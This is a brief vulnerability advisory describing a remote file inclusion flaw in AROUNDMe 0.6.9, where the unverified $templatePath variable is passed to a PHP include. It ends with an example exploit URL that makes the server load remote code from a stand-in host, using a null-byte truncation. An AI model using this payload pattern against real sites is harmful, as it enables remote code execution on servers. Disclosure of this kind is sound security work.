== AROUNDMe 0.6.9 remonte file inclusion vendor site: http://barnraiser.org/ vulnerable versions: 0.6.9 (and possibly older) discovered by: noislet ( http://www.noislet.org/ ) vendor informed: 21.10.2006 published: 22.10.2006 == product info: AROUNDMe is the perfect solution for you to bring people together around shared goals, activities and interests to form a shared knowledge network. == bug details: Input passed to the $templatePath is not verified before being used to include files. required: register_globals = On file: pol_view.tpl.php (and others) buggy code: if (isset($poll)) { ... include $templatePath . poll_detail.inc.tpl.php; == example exploitation: http://random.site/aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1templatePath=http://example.com/evilcode.php%00 -- noislet \ page http://www.noislet.org/